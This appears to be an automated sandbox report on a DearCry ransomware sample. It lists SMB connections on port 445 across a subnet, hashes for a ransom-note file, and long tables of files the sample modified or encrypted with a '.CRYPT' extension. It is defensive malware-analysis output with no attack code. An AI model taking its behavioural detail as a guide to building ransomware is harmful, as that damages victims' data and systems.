N/A	10.127.255.34:445		tcp
N/A	10.127.255.1:445		tcp
N/A	10.127.255.13:445		tcp
N/A	10.127.255.2:445		tcp
N/A	10.127.255.12:445		tcp
N/A	10.127.255.45:445		tcp
N/A	10.127.255.51:445		tcp
N/A	10.127.255.25:445		tcp
N/A	10.127.255.28:445		tcp
N/A	10.127.255.32:445		tcp
N/A	10.127.255.9:445		tcp
N/A	10.127.255.5:445		tcp
N/A	10.127.255.57:445		tcp
N/A	10.127.255.42:445		tcp
N/A	10.127.255.26:445		tcp
N/A	10.127.255.60:445		tcp
N/A	10.127.255.7:445		tcp
N/A	10.127.255.37:445		tcp
N/A	10.127.255.17:445		tcp
N/A	10.127.255.23:445		tcp
N/A	10.127.255.33:445		tcp
N/A	10.127.255.0:445		tcp
N/A	10.127.255.6:445		tcp
N/A	10.127.255.53:445		tcp
N/A	10.127.255.61:445		tcp
N/A	10.127.255.64:445		tcp
N/A	10.127.255.16:445		tcp
N/A	10.127.255.31:445		tcp
N/A	10.127.255.8:445		tcp
N/A	10.127.255.22:445		tcp
N/A	10.127.255.43:445		tcp
N/A	10.127.255.36:445		tcp
N/A	10.127.255.47:445		tcp
N/A	10.127.255.44:445		tcp
N/A	10.127.255.3:445		tcp
N/A	10.127.255.24:445		tcp
N/A	10.127.255.40:445		tcp
N/A	10.127.255.19:445		tcp
N/A	10.127.255.21:445		tcp
N/A	10.127.255.56:445		tcp
N/A	10.127.255.59:445		tcp
N/A	10.127.255.18:445		tcp
N/A	10.127.255.29:445		tcp
N/A	10.127.255.14:445		tcp
N/A	10.127.255.41:445		tcp
N/A	10.127.255.63:445		tcp
N/A	10.127.255.115:445		tcp
N/A	10.127.255.67:445		tcp
N/A	10.127.255.71:445		tcp
N/A	10.127.255.79:445		tcp
N/A	10.127.255.113:445		tcp
N/A	10.127.255.81:445		tcp
N/A	10.127.255.84:445		tcp
N/A	10.127.255.91:445		tcp
N/A	10.127.255.76:445		tcp
N/A	10.127.255.124:445		tcp
N/A	10.127.255.100:445		tcp
N/A	10.127.255.116:445		tcp
N/A	10.127.255.122:445		tcp
N/A	10.127.255.110:445		tcp
N/A	10.127.255.69:445		tcp
N/A	10.127.255.70:445		tcp
N/A	10.127.255.120:445		tcp
N/A	10.127.255.107:445		tcp
N/A	10.127.255.108:445		tcp
N/A	10.127.255.130:445		tcp
N/A	10.127.255.78:445		tcp
N/A	10.127.255.68:445		tcp
N/A	10.127.255.101:445		tcp
N/A	10.127.255.131:445		tcp
N/A	10.127.255.72:445		tcp
N/A	10.127.255.102:445		tcp
N/A	10.127.255.117:445		tcp
N/A	10.127.255.96:445		tcp
N/A	10.127.255.128:445		tcp
N/A	10.127.255.83:445		tcp
N/A	10.127.255.86:445		tcp
N/A	10.127.255.95:445		tcp
N/A	10.127.255.125:445		tcp
N/A	10.127.255.90:445		tcp
N/A	10.127.255.119:445		tcp
N/A	10.127.255.94:445		tcp
N/A	10.127.255.89:445		tcp
N/A	10.127.255.93:445		tcp
N/A	10.127.255.98:445		tcp
N/A	10.127.255.118:445		tcp
N/A	10.127.255.127:445		tcp
N/A	10.127.255.82:445		tcp
N/A	10.127.255.106:445		tcp
N/A	10.127.255.74:445		tcp
N/A	10.127.255.105:445		tcp
N/A	10.127.255.129:445		tcp
N/A	10.127.255.92:445		tcp
N/A	10.127.255.121:445		tcp
N/A	10.127.255.104:445		tcp
N/A	10.127.255.126:445		tcp
N/A	10.127.255.99:445		tcp
N/A	10.127.255.88:445		tcp
N/A	10.127.255.109:445		tcp
N/A	10.127.255.85:445		tcp
N/A	10.127.255.112:445		tcp
N/A	10.127.255.114:445		tcp
N/A	10.127.255.73:445		tcp
N/A	10.127.255.87:445		tcp
N/A	10.127.255.97:445		tcp
N/A	10.127.255.103:445		tcp
N/A	10.127.255.77:445		tcp
N/A	10.127.255.123:445		tcp
N/A	10.127.255.80:445		tcp
N/A	10.127.255.111:445		tcp
N/A	10.127.255.75:445		tcp
N/A	10.127.255.164:445		tcp
N/A	10.127.255.167:445		tcp
N/A	10.127.255.144:445		tcp
N/A	10.127.255.193:445		tcp
N/A	10.127.255.154:445		tcp
N/A	10.127.255.173:445		tcp
N/A	10.127.255.159:445		tcp
N/A	10.127.255.194:445		tcp
N/A	10.127.255.158:445		tcp
N/A	10.127.255.157:445		tcp
N/A	10.127.255.171:445		tcp
N/A	10.127.255.175:445		tcp
N/A	10.127.255.149:445		tcp
N/A	10.127.255.178:445		tcp
N/A	10.127.255.147:445		tcp
N/A	10.127.255.189:445		tcp
N/A	10.127.255.134:445		tcp
N/A	10.127.255.186:445		tcp
N/A	10.127.255.192:445		tcp
N/A	10.127.255.132:445		tcp
N/A	10.127.255.137:445		tcp
N/A	10.127.255.184:445		tcp
N/A	10.127.255.172:445		tcp
N/A	10.127.255.187:445		tcp
N/A	10.127.255.165:445		tcp
N/A	10.127.255.138:445		tcp
N/A	10.127.255.168:445		tcp
N/A	10.127.255.170:445		tcp
N/A	10.127.255.160:445		tcp
N/A	10.127.255.179:445		tcp
N/A	10.127.255.180:445		tcp
N/A	10.127.255.191:445		tcp
N/A	10.127.255.135:445		tcp
N/A	10.127.255.169:445		tcp
N/A	10.127.255.183:445		tcp
N/A	10.127.255.162:445		tcp
N/A	10.127.255.182:445		tcp
N/A	10.127.255.140:445		tcp
N/A	10.127.255.142:445		tcp
N/A	10.127.255.145:445		tcp
N/A	10.127.255.152:445		tcp
N/A	10.127.255.163:445		tcp
N/A	10.127.255.143:445		tcp
N/A	10.127.255.150:445		tcp
N/A	10.127.255.148:445		tcp
N/A	10.127.255.181:445		tcp
N/A	10.127.255.174:445		tcp
N/A	10.127.255.185:445		tcp
N/A	10.127.255.151:445		tcp
N/A	10.127.255.196:445		tcp
N/A	10.127.255.146:445		tcp
N/A	10.127.255.177:445		tcp
N/A	10.127.255.153:445		tcp
N/A	10.127.255.166:445		tcp
N/A	10.127.255.139:445		tcp
N/A	10.127.255.188:445		tcp
N/A	10.127.255.155:445		tcp
N/A	10.127.255.133:445		tcp
N/A	10.127.255.156:445		tcp
N/A	10.127.255.161:445		tcp
N/A	10.127.255.190:445		tcp
N/A	10.127.255.136:445		tcp
N/A	10.127.255.141:445		tcp
N/A	10.127.255.176:445		tcp
N/A	10.127.255.195:445		tcp
N/A	10.127.255.219:445		tcp
N/A	10.127.255.205:445		tcp
N/A	10.127.255.208:445		tcp
N/A	10.127.255.228:445		tcp
N/A	10.127.255.215:445		tcp
N/A	10.127.255.206:445		tcp
N/A	10.127.255.235:445		tcp
N/A	10.127.255.230:445		tcp
N/A	10.127.255.254:445		tcp
N/A	10.127.255.239:445		tcp
N/A	10.127.255.246:445		tcp
N/A	10.127.255.209:445		tcp
N/A	10.127.255.200:445		tcp
N/A	10.127.255.221:445		tcp
N/A	10.127.255.207:445		tcp
N/A	10.127.255.225:445		tcp
N/A	10.127.255.214:445		tcp
N/A	10.127.255.222:445		tcp
N/A	10.127.255.241:445		tcp
N/A	10.127.255.217:445		tcp
N/A	10.127.255.249:445		tcp
N/A	10.127.255.236:445		tcp
N/A	10.127.255.250:445		tcp
N/A	10.127.255.242:445		tcp
N/A	10.127.255.251:445		tcp
N/A	10.127.255.223:445		tcp
N/A	10.127.255.244:445		tcp
N/A	10.127.255.245:445		tcp
N/A	10.127.255.233:445		tcp
N/A	10.127.255.227:445		tcp
N/A	10.127.255.224:445		tcp
N/A	10.127.255.199:445		tcp
N/A	10.127.255.212:445		tcp
N/A	10.127.255.202:445		tcp
N/A	10.127.255.234:445		tcp
N/A	10.127.255.198:445		tcp
N/A	10.127.255.216:445		tcp
N/A	10.127.255.210:445		tcp
N/A	10.127.255.248:445		tcp
N/A	10.127.255.226:445		tcp
N/A	10.127.255.220:445		tcp
N/A	10.127.255.218:445		tcp
N/A	10.127.255.229:445		tcp
N/A	10.127.255.231:445		tcp
N/A	10.127.255.232:445		tcp
N/A	10.127.255.201:445		tcp
N/A	10.127.255.240:445		tcp
N/A	10.127.255.237:445		tcp
N/A	10.127.255.204:445		tcp
N/A	10.127.255.253:445		tcp
N/A	10.127.255.213:445		tcp
N/A	10.127.255.243:445		tcp
N/A	10.127.255.211:445		tcp
N/A	10.127.255.247:445		tcp
N/A	10.127.255.252:445		tcp
N/A	10.127.255.238:445		tcp
N/A	10.127.255.197:445		tcp
N/A	10.127.255.203:445		tcp

Files

C:\Program Files\R3ADM3.txt

MD5	e6f001fc98cb51a0429ca5dc95f6a950
SHA1	16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256	acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512	11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral23

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (3370) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW3CQRP\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PTQYFUC8\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VUFNXJNN\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KIC1AX96\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM9SSQC3\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3294248377-1418901787-4083263181-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3294248377-1418901787-4083263181-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ER80V8JZ\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JN4P46FI\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libvpx_plugin.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libvmem_plugin.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\ContactPicker.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL093.XML.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\System\msadc\msadco.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPreviewTemplate.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\gadget.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OCRVC.DAT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Media Player\Media Renderer\avtransport.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Mozilla Firefox\lgpllibs.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\VSTARemotingServer.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewFrame.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsVersion1Warning.htm	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Conversion.v3.5.resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MAPIR.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libdav1d_plugin.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
